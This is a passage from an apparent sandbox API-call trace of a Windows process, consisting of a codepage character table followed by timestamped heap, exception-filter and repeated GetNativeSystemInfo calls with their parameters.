!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x97\x1cr\x93äþ\x18", lpUsedDefaultChar=0x0) returned 256
	[0025.524] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4050f2) returned 0x0
	[0025.524] RtlSizeHeap (HeapHandle=0x7d60000, Flags=0x0, MemoryPointer=0x7d73278) returned 0x80
	[0025.525] RtlSizeHeap (HeapHandle=0x7d60000, Flags=0x0, MemoryPointer=0x7d73278) returned 0x80
	[0025.525] RtlSizeHeap (HeapHandle=0x7d60000, Flags=0x0, MemoryPointer=0x7d73278) returned 0x80
	[0025.525] RtlSizeHeap (HeapHandle=0x7d60000, Flags=0x0, MemoryPointer=0x7d73278) returned 0x80
	[0025.525] lstrlenW (lpString="") returned 0
	[0025.525] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.525] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.525] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.525] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.526] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.526] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.526] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.526] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.526] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.526] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.526] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.526] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.526] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.526] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.526] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.527] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.527] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.527] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.527] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.527] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.527] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.527] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.527] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.527] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.527] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.527] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.528] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.528] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.528] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.528] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.528] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.529] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.529] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.529] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.530] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.530] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.530] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.530] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.530] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.530] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.530] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.530] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.530] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.530] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.530] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.531] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.531] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.531] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.531] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.531] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.531] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.531] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.531] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.531] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.531] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.531] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.531] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.532] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
